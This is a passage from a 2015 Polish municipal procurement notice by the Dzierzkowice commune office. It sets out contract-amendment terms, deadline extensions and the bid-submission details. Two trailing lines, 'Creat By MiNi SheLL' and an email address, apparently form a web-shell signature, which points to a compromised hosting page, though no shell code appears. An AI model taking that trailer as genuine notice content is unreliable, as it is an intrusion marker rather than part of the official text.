2) 	zmiana sposobu wykonania zamówienia, materiałów budowlanych, sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie, 
3) 	zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonego w § 9 ust. 1 umowy, 
4) 	zmiana terminu realizacji przedmiotu zamówienia w przypadku: 
a) 	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego, 
b) 	działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie, 
c) 	zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, fakt ten musi być potwierdzony pisemnie przez Zamawiającego, 
d) 	realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, 
e) 	błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie, 
f) 	konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót, 
g) 	konieczność wykonania dodatkowych badań i ekspertyz. 
5) 	zmiana albo rezygnacja z podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. 

3. 	Zmiany umowy przewidziane w ust. 2 dopuszczalne są na następujących warunkach: 
ad pkt 1) - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego; 
ad pkt 2) - zamiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty oraz zmiana sposobu wykonania zamówienia powodująca usprawnienie procesu budowy, zwiększeniem bezpieczeństwa na budowie pod warunkiem nie zwiększania ceny; 
ad pkt 3) - stawka i kwota podatku VAT ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę. Jeżeli zmiana ta powodować będzie zmianę kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmiany wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę; 
ad pkt 4) 
lit. a) - o czas umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego, 
lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, 
lit. c) - o czas trwania niesprzyjających warunków atmosferycznych lub czas spełnienia wymogów technologicznych, 
lit. d) - o czas niezbędny do wykonania prac powiązanych z przedmiotem niniejszej umowy, realizowanych w drodze odrębnej umowy, 
lit. e) - o czas niezbędny do naniesienia przez projektanta poprawek lub zmian w projekcie, 
lit .f) - o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień, 
lit. g) - o czas niezbędny do wykonania dodatkowych ekspertyz i badań, 
ad pkt 5) - Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 
4. 	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugdzierzkowice.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dzierzkowice Terpentyna 1 23-251 Dzierzkowice , pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2015 godzina 09:00, miejsce: Urząd Gminy Dzierzkowice Terpentyna 1 23-251 Dzierzkowice , pokój nr 10 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com